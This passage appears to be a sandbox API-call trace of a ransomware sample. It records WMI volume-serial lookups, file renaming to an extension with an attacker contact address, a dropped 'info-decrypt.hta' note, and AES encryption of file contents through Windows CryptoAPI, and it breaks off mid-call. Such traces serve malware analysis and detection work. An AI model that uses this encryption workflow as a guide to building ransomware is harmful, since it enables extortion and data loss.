pType=0x36a0278*=0, plFlavor=0x36a027c*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36a0278*=8, plFlavor=0x36a027c*=0) returned 0x0 [0158.501] SysStringByteLen (bstr="9C354B42") returned 0x10 [0158.501] SysStringByteLen (bstr="9C354B42") returned 0x10 [0158.501] IWbemClassObject:Get (in: This=0x6028978, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36a0278*=8, plFlavor=0x36a027c*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36a0278*=8, plFlavor=0x36a027c*=0) returned 0x0 [0158.501] SysStringByteLen (bstr="9C354B42") returned 0x10 [0158.501] SysStringByteLen (bstr="9C354B42") returned 0x10 [0158.501] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", lpFilePart=0x0) returned 0x34 [0158.501] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x57 [0158.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0158.501] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x1b45f160, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0158.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0158.502] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0158.502] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", lpFilePart=0x0) returned 0x34 [0158.502] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0158.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0158.503] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0158.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0158.503] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", lpFilePart=0x0) returned 0x34 [0158.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0158.503] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm"), fInfoLevelId=0x0, lpFileInformation=0x36a07a0 | out: lpFileInformation=0x36a07a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4289)) returned 1 [0158.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0158.503] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", lpFilePart=0x0) returned 0x34 [0158.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0158.503] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x328 [0158.503] GetFileType (hFile=0x328) returned 0x1 [0158.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0158.503] GetFileType (hFile=0x328) returned 0x1 [0158.503] GetFileSize (in: hFile=0x328, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x4289 [0158.504] ReadFile (in: hFile=0x328, lpBuffer=0x38973c8, nNumberOfBytesToRead=0x4289, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x38973c8*, lpNumberOfBytesRead=0x8f6eedc*=0x4289, lpOverlapped=0x0) returned 1 [0158.505] CloseHandle (hObject=0x328) returned 1 [0158.506] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0xbe0c68) returned 1 [0158.506] CryptGenRandom (in: hProv=0xbe0c68, dwLen=0x10, pbBuffer=0x389b9a8 | out: pbBuffer=0x389b9a8) returned 1 [0159.211] CryptImportKey (in: hProv=0xbe0c68, pbData=0x36b7fe8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f7d0) returned 1 [0159.211] CryptContextAddRef (hProv=0xbe0c68, pdwReserved=0x0, dwFlags=0x0) returned 1 [0159.211] CryptContextAddRef (hProv=0xbe0c68, pdwReserved=0x0, dwFlags=0x0) returned 1 [0159.211] CryptDuplicateKey (in: hKey=0xb7f7d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7f710) returned 1 [0159.211] CryptContextAddRef (hProv=0xbe0c68, pdwReserved=0x0, dwFlags=0x0) returned 1 [0159.212] CryptSetKeyParam (hKey=0xb7f710, dwParam=0x4, pbData=0x36b80c8*=0x1, dwFlags=0x0) returned 1 [0159.212] CryptSetKeyParam (hKey=0xb7f710, dwParam=0x1, pbData=0x36b8094, dwFlags=0x0) returned 1 [0159.212] CryptEncrypt (in: hKey=0xb7f710, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36b80d8*, pdwDataLen=0x8f6eea8*=0x4290, dwBufLen=0x4290 | out: pbData=0x36b80d8*, pdwDataLen=0x8f6eea8*=0x4290) returned 1 [0159.212] CryptEncrypt (in: hKey=0xb7f710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36bc38c*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x36bc38c*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0159.214] CryptDestroyKey (hKey=0xb7f7d0) returned 1 [0159.214] CryptReleaseContext (hProv=0xbe0c68, dwFlags=0x0) returned 1 [0159.214] CryptReleaseContext (hProv=0xbe0c68, dwFlags=0x0) returned 1 [0159.214] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", lpFilePart=0x0) returned 0x34 [0159.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0159.214] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f0 [0159.450] GetFileType (hFile=0x2f0) returned 0x1 [0159.451] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0159.451] GetFileType (hFile=0x2f0) returned 0x1 [0159.451] WriteFile (in: hFile=0x2f0, lpBuffer=0x3748a20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x3748a20*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0159.592] CloseHandle (hObject=0x2f0) returned 1 [0159.592] CoTaskMemAlloc (cb=0x20c) returned 0x66cc620 [0159.592] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66cc620 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0159.592] CoTaskMemFree (pv=0x66cc620) [0159.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0159.592] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0159.593] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0159.593] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0159.593] IUnknown:Release (This=0xb51e34) returned 0x1 [0159.594] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x6024c30) returned 0x0 [0159.594] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024c30, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0159.594] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024c30, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x60306a0) returned 0x0 [0159.594] WbemDefPath:IUnknown:Release (This=0x6024c30) returned 0x0 [0159.594] WbemDefPath:IUnknown:QueryInterface (in: This=0x60306a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x60306a0) returned 0x0 [0159.594] WbemDefPath:IUnknown:QueryInterface (in: This=0x60306a0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0159.594] WbemDefPath:IUnknown:AddRef (This=0x60306a0) returned 0x3 [0159.594] WbemDefPath:IUnknown:QueryInterface (in: This=0x60306a0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0159.594] WbemDefPath:IUnknown:QueryInterface (in: This=0x60306a0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0159.594] WbemDefPath:IUnknown:QueryInterface (in: This=0x60306a0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0xbb5938) returned 0x0 [0159.595] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5938, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0159.595] WbemDefPath:IUnknown:Release (This=0xbb5938) returned 0x3 [0159.595] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0159.595] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0159.595] WbemDefPath:IUnknown:QueryInterface (in: This=0x60306a0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0159.595] WbemDefPath:IUnknown:Release (This=0x60306a0) returned 0x2 [0159.595] WbemDefPath:IUnknown:Release (This=0x60306a0) returned 0x1 [0159.595] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0159.595] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0159.595] WbemDefPath:IUnknown:QueryInterface (in: This=0x60306a0, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x60306a0) returned 0x0 [0159.595] WbemDefPath:IUnknown:AddRef (This=0x60306a0) returned 0x3 [0159.595] WbemDefPath:IUnknown:Release (This=0x60306a0) returned 0x2 [0159.595] WbemDefPath:IWbemPath:SetText (This=0x60306a0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0159.595] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60306a0, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0159.595] WbemDefPath:IWbemPath:GetText (in: This=0x60306a0, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0159.595] WbemDefPath:IWbemPath:GetText (in: This=0x60306a0, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0159.595] WbemDefPath:IWbemPath:GetInfo (in: This=0x60306a0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0159.595] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60306a0, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0159.595] WbemDefPath:IWbemPath:GetInfo (in: This=0x60306a0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0159.595] WbemDefPath:IWbemPath:GetInfo (in: This=0x60306a0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0159.595] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60306a0, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0159.595] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0159.596] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0159.596] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0159.596] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0159.596] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0159.596] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0159.596] IUnknown:Release (This=0xb51e34) returned 0x1 [0159.597] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x60275b0) returned 0x0 [0159.597] WbemDefPath:IUnknown:QueryInterface (in: This=0x60275b0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0159.597] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60275b0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6030710) returned 0x0 [0159.597] WbemDefPath:IUnknown:Release (This=0x60275b0) returned 0x0 [0159.597] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030710, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6030710) returned 0x0 [0159.597] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030710, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0159.597] WbemDefPath:IUnknown:AddRef (This=0x6030710) returned 0x3 [0159.597] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030710, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0159.597] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030710, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0159.597] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030710, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0xbb5958) returned 0x0 [0159.597] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5958, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0159.597] WbemDefPath:IUnknown:Release (This=0xbb5958) returned 0x3 [0159.598] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0159.598] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0159.598] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030710, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0159.598] WbemDefPath:IUnknown:Release (This=0x6030710) returned 0x2 [0159.598] WbemDefPath:IUnknown:Release (This=0x6030710) returned 0x1 [0159.598] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0159.598] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0159.598] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030710, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6030710) returned 0x0 [0159.598] WbemDefPath:IUnknown:AddRef (This=0x6030710) returned 0x3 [0159.598] WbemDefPath:IUnknown:Release (This=0x6030710) returned 0x2 [0159.598] WbemDefPath:IWbemPath:SetText (This=0x6030710, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0159.598] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030710, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0159.598] WbemDefPath:IWbemPath:GetText (in: This=0x6030710, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0159.598] WbemDefPath:IWbemPath:GetText (in: This=0x6030710, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0159.598] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0159.598] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0159.598] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0159.598] IUnknown:Release (This=0xb51e34) returned 0x1 [0159.599] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x601f510) returned 0x0 [0159.599] WbemLocator:IUnknown:QueryInterface (in: 